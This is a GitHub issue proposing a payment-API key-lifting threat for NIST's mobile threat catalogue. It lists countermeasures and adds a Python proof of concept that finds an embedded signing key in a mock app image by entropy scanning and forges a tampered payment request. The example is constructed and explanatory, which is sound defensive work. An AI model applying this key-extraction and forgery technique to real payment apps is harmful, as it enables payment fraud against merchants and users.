usnistgov / mobile-threat-catalogue

NIST/NCCoE Mobile Threat Catalogue
https://pages.nist.gov/mobile-threat-catalogue

New PAY threat: Vulnerabilities of 3rd party payment API for tampering and cryptographic key lifting attacks #53

Open sdog-mitre opened 8 years ago

sdog-mitre commented 8 years ago

On behalf of Prashanth Thandavamurthy of Arxan Technologies, Inc.

New Threat

Threat Category: Payment

Threat: Vulnerabilities of 3rd party payment API for code analysis/tampering and cryptographic key lifting attacks.

Threat Origin: API Attacks

http://www.cl.cam.ac.uk/~rja14/Papers/SEv2-c18.pdf

Exploit Example: None

CVE Example: None

Possible Countermeasures:

  1. Follow secure coding guidelines
  2. Use a cryptographic key protection solution such as Whitebox Cryptography to ensure:
     a. Cryptographic keys are not discovered at any time, and are not present in static form or in runtime memory
     b. Data is protected at rest, in transit and in-use
  3. Protect the API from reverse-engineering and code tampering/modification attacks
  4. Leverage vulnerability/penetration testing and ensure that known risks – including those identified in the OWASP mobile top 10 list, in particular, are addressed

References: None
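Added example, not part of the catalogue entry or the Arxan submission: what "cryptographic key lifting" looks like against a payment SDK that embeds its request-signing key as plain bytes (the situation countermeasure 2a is meant to rule out). The app image is constructed in the code (repetitive filler bytes, ASCII strings, the key, a URL); the key is the FIPS-197 Appendix C.3 AES-256 test vector, used only as a recognisable 32-byte constant; and the assumption that the API signs requests with HMAC-SHA256 over the request body is mine, since the issue does not say what the third-party API uses. The scan slides a 32-byte window over the image and flags windows whose Shannon entropy exceeds 4.6 bits (32 random bytes average about 4.9; code and strings stay near or below 4.0), then confirms a candidate alignment by recomputing the HMAC of one observed request and matching the observed signature.

```python
"""Static key lifting by sliding-window entropy, then candidate confirmation
against an observed signed request.  Constructed example; the app image,
request format and HMAC-SHA256 signing scheme are assumptions."""
import hashlib
import hmac
import math

# Constructed: FIPS-197 Appendix C.3 AES-256 example key, reused here only as
# a recognisable 32-byte constant that the "app" embeds as plain bytes.
EMBEDDED_KEY = bytes.fromhex(
    "603deb1015ca71be2b73aef0857d77811f352c073b6108d72d9810a30914dff4"
)


def build_sample_image() -> tuple[bytes, int]:
    """Constructed stand-in for an app binary: repetitive filler bytes,
    ASCII strings, the embedded key, a URL, more filler.
    Returns (image, key_offset)."""
    filler = b"\x55\x48\x89\xe5\x48\x83\xec\x20\x48\x8b\x45\xf8\xc3\x90" * 40
    strings = (b"Payment authorized\0Payment declined by issuer\0"
               b"Network error, retry later\0sig=\0amount=\0")
    image = filler + strings
    key_offset = len(image)
    image += EMBEDDED_KEY
    image += b"https://api.example.invalid/v1/charge\0" + filler
    return image, key_offset


def shannon_entropy(chunk: bytes) -> float:
    """Bits of entropy per byte over the chunk (max log2(len) for short chunks)."""
    n = len(chunk)
    counts = {}
    for b in chunk:
        counts[b] = counts.get(b, 0) + 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def find_high_entropy_regions(image: bytes, window: int = 32,
                              threshold: float = 4.6) -> list[tuple[int, int]]:
    """Slide a window over the image; merge overlapping windows whose entropy
    exceeds the threshold into (start, end) regions.  A plain-bytes key shows
    up as an island of high entropy inside low-entropy code and text."""
    regions: list[list[int]] = []
    for off in range(len(image) - window + 1):
        if shannon_entropy(image[off:off + window]) > threshold:
            end = off + window
            if regions and off <= regions[-1][1]:
                regions[-1][1] = max(regions[-1][1], end)
            else:
                regions.append([off, end])
    return [(s, e) for s, e in regions]


def sign_request(key: bytes, request: bytes) -> str:
    """Assumed signing scheme: HMAC-SHA256 over the request body, hex-encoded."""
    return hmac.new(key, request, hashlib.sha256).hexdigest()


def lift_key(image: bytes, observed_request: bytes, observed_sig: str,
             key_len: int = 32):
    """Try every key_len-byte alignment inside each high-entropy region and
    keep the one that reproduces a signature captured from the genuine app.
    Returns (offset, key) or None."""
    for start, end in find_high_entropy_regions(image, window=key_len):
        for off in range(start, end - key_len + 1):
            candidate = image[off:off + key_len]
            if hmac.compare_digest(sign_request(candidate, observed_request),
                                   observed_sig):
                return off, candidate
    return None


if __name__ == "__main__":
    image, key_offset = build_sample_image()
    # Constructed: one request/signature pair as the genuine app would send it.
    request = b"POST /v1/charge amount=100.00 currency=USD merchant=M123"
    sig = sign_request(EMBEDDED_KEY, request)
    print("high-entropy regions:", find_high_entropy_regions(image))
    found = lift_key(image, request, sig)
    print("lifted key at offset", found[0], "(expected", key_offset, "):",
          found[1].hex())
    # With the lifted key the attacker signs a tampered request the API accepts.
    forged = b"POST /v1/charge amount=0.01 currency=USD merchant=M123"
    print("forged signature verifies:",
          sign_request(found[1], forged) == sign_request(EMBEDDED_KEY, forged))
```

The entropy threshold is tied to the window size: with 32-byte windows a window of 32 distinct bytes tops out at 5.0 bits, while ASCII text rarely exceeds 22 distinct bytes (log2(22) is about 4.46), so 4.6 separates the two with some margin; a larger window needs a higher threshold. Splitting the key into XOR shares or encoding it defeats this particular scan but not a debugger attached at the point of use, which is why countermeasure 2a asks for the key to be absent from runtime memory as well as from static form.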